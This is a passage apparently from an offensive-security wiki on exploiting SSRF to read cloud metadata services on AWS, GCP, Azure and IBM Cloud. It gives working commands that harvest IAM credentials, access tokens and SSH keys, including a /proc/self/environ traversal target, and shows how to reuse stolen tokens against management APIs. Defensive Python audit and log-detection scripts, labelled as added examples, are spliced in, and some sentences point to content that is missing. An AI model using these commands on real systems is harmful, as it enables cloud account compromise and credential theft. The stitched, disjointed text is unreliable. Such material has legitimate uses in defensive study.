The metadata endpoint can be accessed from inside any EC2 machine and offers interesting information about it. It is reachable at the URL http://169.254.169.254 (information about the metadata here).
There are 2 versions of the metadata endpoint. The first one allows the endpoint to be accessed via GET requests (so any SSRF can exploit it). For version 2, IMDSv2, you need to request a token by sending a PUT request with an HTTP header and then use that token to access the metadata with another HTTP header (so it is more complicated to abuse with an SSRF).
Note that if the EC2 instance is enforcing IMDSv2, according to the docs, the response to the PUT request will have a hop limit of 1, making it impossible to access the EC2 metadata from a container inside the EC2 instance.
Moreover, IMDSv2 will also block requests to fetch a token that include the X-Forwarded-For header. This is to prevent misconfigured reverse proxies from being able to access it.
Note the aws_session_token; it is essential for the profile to work.
PACU can be used with the discovered credentials to find out your privileges and try to escalate privileges.
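The two IMDSv2 controls described above (token-only access and the hop limit of 1) are visible in the EC2 API, so a defender can audit a fleet for instances that still expose IMDSv1 or let containers complete the token handshake. The following is an added example, not code from the original page or from AWS; it reads the MetadataOptions structure that the EC2 DescribeInstances API returns (HttpEndpoint, HttpTokens, HttpPutResponseHopLimit), and SAMPLE_RESERVATIONS is constructed data.

```python
"""Audit EC2 MetadataOptions for the IMDSv2 controls (added example, not the
page's own code). Input has the shape of DescribeInstances()["Reservations"];
SAMPLE_RESERVATIONS below is constructed data, not a real account."""
from typing import Dict, List


def audit_metadata_options(instance: dict) -> List[str]:
    """Return findings for one instance; an empty list means IMDS is hardened or off."""
    opts = instance.get("MetadataOptions", {})
    if opts.get("HttpEndpoint", "enabled") == "disabled":
        return []  # IMDS switched off entirely: nothing for an SSRF to reach
    findings = []
    # "optional" keeps IMDSv1 alive, so a plain GET-based SSRF can read credentials
    if opts.get("HttpTokens", "optional") != "required":
        findings.append("IMDSv1 allowed (HttpTokens is not 'required')")
    # A hop limit above 1 lets the PUT token response cross a NAT/bridge hop,
    # i.e. containers on the host can complete the IMDSv2 handshake.
    # (Assumes the AWS default of 1 when the field is absent.)
    hops = opts.get("HttpPutResponseHopLimit", 1)
    if hops > 1:
        findings.append(f"HttpPutResponseHopLimit is {hops} (>1: reachable from containers)")
    return findings


def audit_reservations(reservations: list) -> Dict[str, List[str]]:
    """Flatten DescribeInstances output into {InstanceId: [findings]}."""
    return {
        inst["InstanceId"]: audit_metadata_options(inst)
        for res in reservations
        for inst in res.get("Instances", [])
    }


# Constructed sample shaped like DescribeInstances()["Reservations"]
SAMPLE_RESERVATIONS = [{"Instances": [
    {"InstanceId": "i-0aaa000000000001",
     "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "required",
                         "HttpPutResponseHopLimit": 1}},
    {"InstanceId": "i-0bbb000000000002",
     "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "optional",
                         "HttpPutResponseHopLimit": 2}},
    {"InstanceId": "i-0ccc000000000003",
     "MetadataOptions": {"HttpEndpoint": "disabled", "HttpTokens": "optional",
                         "HttpPutResponseHopLimit": 1}},
]}]

if __name__ == "__main__":
    # Against a real account: import boto3 and pass
    # boto3.client("ec2").describe_instances()["Reservations"] instead of the sample.
    for iid, findings in audit_reservations(SAMPLE_RESERVATIONS).items():
        print(iid, findings or "OK")
```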
SSRF in AWS ECS (Container Service) credentials
ECS is a logical group of EC2 instances on which you can run an application without having to scale your own cluster management infrastructure, because ECS manages that for you. If you manage to compromise a service running in ECS, the metadata endpoints change.
If you access http://169.254.170.2/v2/credentials/<GUID> you will find the credentials of the ECS machine. But first you need to find the <GUID>. To find the <GUID> you need to read the environment variable AWS_CONTAINER_CREDENTIALS_RELATIVE_URI inside the machine.
You may be able to read it by exploiting a Path Traversal to file:///proc/self/environ
The mentioned http URL should give you the AccessKey, SecretKey and token.
Note that in some cases you will be able to access the EC2 metadata instance from the container (check the IMDSv2 TTL limitations mentioned previously). In these scenarios, from the container you could access both the container IAM role and the EC2 IAM role.
SSRF for AWS Lambda
In this case the credentials are stored in env variables. So, to access them you need to access something like file:///proc/self/environ.
The names of the interesting env variables are:
AWS_SESSION_TOKEN
AWS_SECRET_ACCESS_KEY
AWS_ACCESS_KEY_ID
Moreover, in addition to IAM credentials, Lambda functions also have event data that is passed to the function when it is started. This data is made available to the function via the runtime interface and could contain sensitive information (like inside the stageVariables). Unlike IAM credentials, this data is accessible over standard SSRF at http://localhost:9001/2018-06-01/runtime/invocation/next.
Note that Lambda credentials are inside the env variables. So if the stack trace of the Lambda code prints env variables, it is possible to exfiltrate them by provoking an error in the app.
To use the exfiltrated service account token you can just do:
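All of the AWS targets above (the EC2 IMDS address, the ECS credential endpoint, the Lambda runtime API and the /proc/self/environ traversal target) show up as literal strings in the URL parameters of the SSRF-able request, so a web-server access log is a cheap place to detect them. The following detection script is an added example, not code from the original page; the log lines in SAMPLE_LOG are constructed, and the indicator list is limited to the endpoints this page names.

```python
"""Flag access-log requests whose parameters point at the metadata endpoints
named on this page (added example, not the page's own code). SAMPLE_LOG is
constructed data in the common/combined log format."""
import re
from typing import List, Optional
from urllib.parse import unquote

# Indicators taken from this page's AWS sections (IP/host forms as written there)
METADATA_INDICATORS = (
    "169.254.169.254",     # EC2 / IBM instance metadata
    "169.254.170.2",       # ECS task credential endpoint
    "localhost:9001",      # Lambda runtime API
    "127.0.0.1:9001",
    "/proc/self/environ",  # path-traversal target for env-stored credentials
)

# client ident user [time] "METHOD target proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def find_indicator(request_target: str) -> Optional[str]:
    """Return the first indicator found in the percent-decoded request target."""
    decoded = unquote(unquote(request_target)).lower()  # decode twice: double-encoded params
    for ind in METADATA_INDICATORS:
        if ind in decoded:
            return ind
    return None


def scan_access_log(lines: List[str]) -> List[dict]:
    """Parse access-log lines and return one hit dict per suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line: skip rather than abort the scan
        ind = find_indicator(m["target"])
        if ind:
            hits.append({"src": m["ip"], "time": m["ts"], "status": int(m["status"]),
                         "indicator": ind, "target": m["target"]})
    return hits


SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:10:01:02 +0000] "GET /fetch?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1" 200 512
203.0.113.7 - - [10/Mar/2024:10:01:09 +0000] "GET /fetch?url=http%3A%2F%2F169.254.170.2%2Fv2%2Fcredentials%2F HTTP/1.1" 200 301
198.51.100.4 - - [10/Mar/2024:10:02:00 +0000] "GET /fetch?url=https://example.com/feed.xml HTTP/1.1" 200 8810
203.0.113.7 - - [10/Mar/2024:10:03:15 +0000] "GET /download?file=..%252F..%252Fproc%252Fself%252Fenviron HTTP/1.1" 200 2048
""".splitlines()

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

A 200 status on a flagged line is the case to triage first, since it means the fetch was served rather than blocked.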
# Via env vars
export CLOUDSDK_AUTH_ACCESS_TOKEN=<token>
gcloud projects list

# Via setup
echo "<token>" > /some/path/to/token
gcloud config set auth/access_token_file /some/path/to/token
gcloud projects list
gcloud config unset auth/access_token_file
# Check for those env vars to know if you are in an Azure app
echo $IDENTITY_HEADER
echo $IDENTITY_ENDPOINT

# You should also be able to find the folder:
ls /opt/microsoft
# and the file
ls /opt/microsoft/msodbcsql17

# Get management token
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER
# Get graph token
curl "$IDENTITY_ENDPOINT?resource=https://graph.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER

# API
# Get Subscriptions
URL="https://management.azure.com/subscriptions?api-version=2020-01-01"
curl -H "Authorization: Bearer $TOKEN" "$URL"
# Get current permission on resources in the subscription
URL="https://management.azure.com/subscriptions/<subscription-uid>/resources?api-version=2020-10-01"
curl -H "Authorization: Bearer $TOKEN" "$URL"
# Get permissions in a VM
URL="https://management.azure.com/subscriptions/<subscription-uid>/resourceGroups/Engineering/providers/Microsoft.Compute/virtualMachines/<VM-name>/providers/Microsoft.Authorization/permissions?api-version=2015-07-01"
curl -H "Authorization: Bearer $TOKEN" "$URL"
# API request in powershell to management endpoint
$Token = 'eyJ0eX..'
$URI = 'https://management.azure.com/subscriptions?api-version=2020-01-01'
$RequestParams = @{
    Method  = 'GET'
    Uri     = $URI
    Headers = @{
        'Authorization' = "Bearer $Token"
    }
}
(Invoke-RestMethod @RequestParams).value

# API request to graph endpoint (get enterprise applications)
$Token = 'eyJ0eX..'
$URI = 'https://graph.microsoft.com/v1.0/applications'
$RequestParams = @{
    Method  = 'GET'
    Uri     = $URI
    Headers = @{
        'Authorization' = "Bearer $Token"
    }
}
(Invoke-RestMethod @RequestParams).value

# Using AzureAD Powershell module with both management and graph tokens
$token = 'eyJ0e..'
$graphaccesstoken = 'eyJ0eX..'
Connect-AzAccount -AccessToken $token -GraphAccessToken $graphaccesstoken -AccountId 2e91a4f12984-46ee-2736-e32ff2039abc

# Try to get current perms over resources
Get-AzResource
## The following error means that the user doesn't have permissions over any resource
Get-AzResource : 'this.Client.SubscriptionId' cannot be null.
At line:1 char:1
+ Get-AzResource
+ ~~~~~~~~~~~~~~
    + CategoryInfo          : CloseError: (:) [Get-AzResource], ValidationException
    + FullyQualifiedErrorId : Microsoft.Azure.Commands.ResourceManager.Cmdlets.Implementation.GetAzureResourceCmdlet
IBM Cloud
Note that by default IBM metadata is not enabled, so it is possible that you won't be able to access it even if you are inside an IBM Cloud VM.
export instance_identity_token=`curl -s -X PUT "http://169.254.169.254/instance_identity/v1/token?version=2022-03-01" \
  -H "Metadata-Flavor: ibm" \
  -H "Accept: application/json" \
  -d '{"expires_in": 3600}' | jq -r '(.access_token)'`

# Get instance details
curl -s -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" -X GET "http://169.254.169.254/metadata/v1/instance?version=2022-03-01" | jq

# Get SSH keys info
curl -s -X GET -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" "http://169.254.169.254/metadata/v1/keys?version=2022-03-01" | jq

# Get SSH keys fingerprints & user data
curl -s -X GET -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" "http://169.254.169.254/metadata/v1/instance/initialization?version=2022-03-01" | jq

# Get placement groups
curl -s -X GET -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" "http://169.254.169.254/metadata/v1/placement_groups?version=2022-03-01" | jq

# Get IAM credentials
curl -s -X POST -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" "http://169.254.169.254/instance_identity/v1/iam_token?version=2022-03-01" | jq
The documentation for the metadata services of the various platforms is outlined below, highlighting the methods through which configuration and runtime information for instances can be accessed. Each platform offers unique endpoints to access its metadata services.